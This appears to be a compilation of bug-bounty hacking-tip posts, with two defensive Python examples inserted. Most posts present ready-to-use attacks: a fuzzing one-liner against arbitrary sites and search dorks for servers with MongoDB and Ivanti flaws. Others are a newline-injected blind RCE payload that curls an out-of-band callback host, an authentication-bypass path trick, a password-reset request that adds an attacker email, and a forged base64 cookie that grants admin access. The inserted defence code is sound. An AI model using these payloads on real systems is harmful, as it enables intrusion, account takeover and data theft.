Discover Web Vulns Like a Pro!
Want to hunt XSS, SQLi, LFI, and SSRF on any site? Here's a killer one-liner I've been using:
`gau target.com | gf xss,lfi,sqli,ssrf | qsreplace FUZZ | ffuf -u FUZZ -w payloads/xss.txt,payloads/lfi.txt,payloads/sqli.txt,payloads/ssrf.txt -fr "FUZZ" | tee param_vulns.txt`
What's it do?
1. Grabs URLs: gau digs up every URL for target.com from the web's archives.
2. Finds Weak Spots: gf filters for params ripe for hacking (XSS, SQLi, etc.).
3. Sets the Trap: qsreplace swaps values with FUZZ for testing.
4. Fuzzes Hard: ffuf blasts payloads from my custom lists - XSS popups, file leaks, you name it!
5. Saves the Loot: Results land in param_vulns.txt for you to exploit.
Pro Tip: Add -t 50 to ffuf for speed, or -fc 404 to skip dead ends. Test responsibly!
Curious about hacking tricks like this? Join my crew at https://discord.gg/u7uMFV833h for more tools, tips, and chaos. Dr
CVE-2025-3083, -3084, -3085: Vulnerabilities in MongoDB, 6.5 - 8.1 rating
Vulnerabilities in some versions of MongoDB allow attackers to perform DoS and gain unauthorized access using revoked certificates.
Search at Netlas.io:
Link: https://nt.ls/aqCrV
Dork: mongodb.build_info.version:[6.0.0 TO 6.0.20] OR mongodb.build_info.version:[5.0.0 TO 5.0.31] OR mongodb.build_info.version:[7.0.0 TO 7.0.16]
Vendor's advisory: https://jira.mongodb.org/browse/SERVER-95445
Freelance Security Analyst for CTF Challenge
Job Type: Freelance | Remote | Short-term
We need an experienced cybersecurity professional to assist with a CTF challenge. Must be skilled in:
- Web Exploitation, Reverse Engineering, Cryptography, Forensics, OSINT
- CTF platforms (Hack The Box, TryHackMe, PicoCTF, etc.)
- Tools like Burp Suite, Wireshark, Ghidra, IDA Pro, Metasploit
- Ethical hacking & exploit development (OSCP, CEH preferred)
Send your resume to [email protected] or WhatsApp +91-8016167754.
Let's solve this challenge together!
Use TLSx to detect certificate misconfigurations
Use this command to check for expired, self-signed, mismatched, revoked AND untrusted certificates
A simple Python script to scan multiple targets for SQL Injection via HTTP headers like User-Agent, X-Forwarded-For, and X-Client-IP.
https://github.com/ifconfig-me/SQLi-Scanner
CVE-2025-22457: RCE in Ivanti Connect Secure, 9.0 rating
A buffer overflow in Ivanti Connect Secure allows an unauthenticated attacker to perform remote code execution.
Search at Netlas.io:
Link: https://nt.ls/zsWig
Dork: http.body:"welcome.cgi?p=logo"
Vendor's advisory: https://forums.ivanti.com/s/article/April-Security-Advisory-Ivanti-Connect-Secure-Policy-Secure-ZTA-Gateways-CVE-2025-22457?language=en_US
Web Pentesting & Bug Bounty Batch - Starting April!
Master Web Penetration Testing with a Bug Bounty Approach in our new batch starting this April! Learn real-world attack scenarios, exploitation techniques, and defense strategies.
- Weekday & Weekend Batches - Evening Slots (IST)
- Hands-on Labs & Live Automations
- Bug Bounty Methodologies & Practical Hunting
- Community Support & Private POC Access
Limited slots! Enroll now and take your hacking skills to the next level.
DM https://wa.link/brutsecurity for details! (https://wa.me/+918945971332)
https://github.com/musana/CF-Hero
domains.txt
836.9 KB
Download all bug bounty programs domains in scope items
Get a full list of domains from active bug bounty programs across platforms like HackerOne, Bugcrowd, Intigriti, and more - all in one place!
Step 1: Download the domains.txt file
Step 2: Extract only main/root domains
`cat domains.txt | awk -F '.' '{print $(NF-1)"."$NF}' | grep -Eo '([a-zA-Z0-9-]+\.)+[a-zA-Z]{2,}' | sort -u > main_domains`
Step 3: Extract all IP addresses:
`grep -Eo '\b([0-9]{1,3}\.){3}[0-9]{1,3}\b' domains.txt > ips.txt`
Don't forget to give reactions
Top 25 Bug Bounty Platforms
01. Bugcrowd
02. HackerOne
03. Intigriti
04. YesWeHack
05. Synack, Inc.
06. HackenProof | Web3 bug bounty platform
07. Open Bug Bounty
08. Immunefi
09. Cobalt
10. Zerocopter
11. Yogosha
12. SafeHats
13. Vulnerability Research Labs, LLC
14. AntiHACKme Pte Ltd
15. RedStorm Information Security
16. Cyber Army Indonesia
17. Hacktrophy
18. Nordic Defender
19. Capture The Bug
20. Bugbounter
21. Detectify
22. BugBase
23. huntr
24. Pentabug
25. SecureBug
Happy Hunt
Never forget to check for blind RCE!
I was testing a login panel and had a gut feeling the username field might be vulnerable. I tried some classic payloads like:
;id | whoami & uname
But... firewall detected and blocked them all.
Even when I tried curl or ping for blind RCE - still blocked.
Then I thought: maybe the WAF is only scanning the first line of the input? So why not try a little trick?
Payload idea: Inject a newline before the actual payload:
attacker'%0acurl https://tluxnubdqopuwecbljrj5i6tot8ddd64b.oast.fun
(Use %0a for newline - URL encoded)
And boom - Blind RCE triggered! My server got the hit instantly.
Cybersecurity isn't about effort - it's about mindset. Deep thinking always wins over brute force.
DarkShadow
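For defenders, the post above comes down to a filter that inspects only the first line of a value. This added example (not part of the original post) puts such a deny-list beside an allow-list that validates the whole decoded username. The regex rule, function names and sample values are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote

# Hypothetical deny-list rule of the kind the post guesses at: without
# re.DOTALL, '.' stops at the first newline, so only line one is inspected.
FIRST_LINE_RULE = re.compile(r"^.*(?:[;|&`$]|\b(?:curl|wget|ping)\b)")

# Allow-list for a username, applied to the whole decoded value.
USERNAME_OK = re.compile(r"[A-Za-z0-9_.-]{1,32}")


def weak_filter_blocks(raw: str) -> bool:
    """First-line deny-list: True when the rule fires."""
    return FIRST_LINE_RULE.match(unquote(raw)) is not None


def username_is_valid(raw: str) -> bool:
    """fullmatch() must consume every character, newlines included."""
    return USERNAME_OK.fullmatch(unquote(raw)) is not None


# Constructed samples; the callback host is a placeholder.
SAMPLES = [
    "darkshadow",
    ";id | whoami & uname",
    "attacker'%0acurl https://callback.example",
    "attacker%0a",
]


def audit(samples=SAMPLES):
    """Return (value, blocked_by_weak_filter, accepted_by_allow_list)."""
    return [(s, weak_filter_blocks(s), username_is_valid(s)) for s in samples]


if __name__ == "__main__":
    for row in audit():
        print(row)
```

The allow-list rejects the newline-prefixed value that the first-line rule lets through. The underlying fix is still to keep request fields out of any shell command line.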
You can find
Broken access control to IDOR vulnerability:
using this simple trick (effective for .NET web apps and sometimes works in PHP-based web apps)
target.com/hidden - this page requires authentication or redirects to the /login page.
Try: target.com/login/hidden
OMG! Auth bypass
Password Reset Bypass Trick
Some poorly secured endpoints accept multiple email parameters.
Try this:
POST /passwordReset HTTP/1.1
Content-Type: application/x-www-form-urlencoded
[email protected]&[email protected]
Or in JSON:
{
"email": ["[email protected]", "[email protected]"]
}
If the app sends the reset link to both emails... you're in.
Now imagine if the victim is an admin - hello dashboard, hello bounty!
#bugbountytips
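On the server side, the fix for the behaviour described above is to accept exactly one address per reset request. This is an added example, not code from the original post. The function names, the `email` field handling and the sample addresses are assumptions constructed for illustration.

```python
import json
from urllib.parse import parse_qs


class RejectedRequest(ValueError):
    """Raised when a reset request does not name exactly one address."""


def _no_duplicate_keys(pairs):
    # json.loads silently keeps the last duplicate key; refuse instead.
    keys = [k for k, _ in pairs]
    if len(keys) != len(set(keys)):
        raise RejectedRequest("duplicate JSON key")
    return dict(pairs)


def single_email(body: str, content_type: str) -> str:
    """Return the one address in the request body or raise RejectedRequest."""
    media_type = content_type.split(";")[0].strip().lower()
    if media_type == "application/json":
        try:
            doc = json.loads(body, object_pairs_hook=_no_duplicate_keys)
        except json.JSONDecodeError as exc:
            raise RejectedRequest("malformed JSON") from exc
        value = doc.get("email") if isinstance(doc, dict) else None
        if not isinstance(value, str):  # rejects arrays, objects, null
            raise RejectedRequest("email must be a single string")
    else:
        values = parse_qs(body, keep_blank_values=True).get("email", [])
        if len(values) != 1:  # rejects email=a&email=b
            raise RejectedRequest("expected exactly one email parameter")
        value = values[0]
    # No separators that a mail library could split into several recipients.
    if value.count("@") != 1 or any(c in value for c in ",; \r\n"):
        raise RejectedRequest("not a single address")
    return value


def accepts(body: str, content_type: str) -> bool:
    """Convenience wrapper: True when the request passes validation."""
    try:
        single_email(body, content_type)
        return True
    except RejectedRequest:
        return False
```

Validation is only the first half: the reset link should be mailed to the address stored on the matching account, not to the string taken from the request.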
Recently disclosed HackerOne critical bug, which can be exploited in under a few minutes!
POC:
GET /reports/***.json HTTP/2
Host: hackerone.com
If you guys are interested in knowing simple and smart tricks - never forget to react
A simple hunt can flip the whole game!
While testing a web app, I noticed this suspicious-looking session cookie:
Cookie: session=e3VzZXI6ZGFya3NoYWRvdyxyb2xlOnVzZXJ9Cg==
I quickly ran it through Base64 decoding:
echo "e3VzZXI6ZGFya3NoYWRvdyxyb2xlOnVzZXJ9Cg==" | base64 -d
{user:darkshadow,role:user}
Wow - it's a JSON-style string in plain Base64.
Time to see how deep the rabbit hole goes...
I modified the role from user to admin:
echo "{user:darkshadow,role:admin}" | base64
e3VzZXI6ZGFya3NoYWRvdyxyb2xlOmFkbWlufQo=
Then replaced the cookie:
Cookie: session=e3VzZXI6ZGFya3NoYWRvdyxyb2xlOmFkbWlufQo=
BOOM Instantly, we got admin access!
Follow me ...DarkShadow...
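The cookie in the post above is trusted after nothing more than a Base64 decode. This added example (not part of the original post) shows that behaviour beside a server-side HMAC check that rejects the edited value. The key, the `payload.tag` cookie layout and the function names are assumptions made for illustration.

```python
import base64
import hashlib
import hmac

SECRET = b"constructed-demo-key"  # assumption: server-side key, never sent to clients
PAGE_ADMIN = "e3VzZXI6ZGFya3NoYWRvdyxyb2xlOmFkbWlufQo="  # edited cookie from the post


def read_unsigned(cookie: str) -> bytes:
    """Behaviour described in the post: decode the cookie and trust it."""
    return base64.b64decode(cookie)


def sign(payload: bytes, key: bytes = SECRET) -> str:
    """Return '<base64 payload>.<base64 HMAC-SHA256 tag>'."""
    tag = hmac.new(key, payload, hashlib.sha256).digest()
    return base64.b64encode(payload).decode() + "." + base64.b64encode(tag).decode()


def verify(cookie: str, key: bytes = SECRET):
    """Return the payload bytes when the tag is valid, otherwise None."""
    body, sep, tag = cookie.partition(".")
    if not sep:
        return None  # no tag at all, like the cookies in the post
    try:
        payload = base64.b64decode(body, validate=True)
        given = base64.b64decode(tag, validate=True)
    except ValueError:  # binascii.Error is a ValueError
        return None
    expected = hmac.new(key, payload, hashlib.sha256).digest()
    # Constant-time comparison so the tag cannot be guessed byte by byte.
    return payload if hmac.compare_digest(given, expected) else None


def swap_body(cookie: str, new_body_b64: str) -> str:
    """Model the edit from the post: new payload, old tag kept."""
    return new_body_b64 + "." + cookie.partition(".")[2]


if __name__ == "__main__":
    legit = sign(b"{user:darkshadow,role:user}")
    print(read_unsigned(PAGE_ADMIN))            # accepted by the unsigned scheme
    print(verify(legit))                        # payload returned
    print(verify(swap_body(legit, PAGE_ADMIN))) # None: tag no longer matches
```

A tag gives integrity only. Keeping the role in server-side session state and storing just a random session ID in the cookie removes the field from the client altogether.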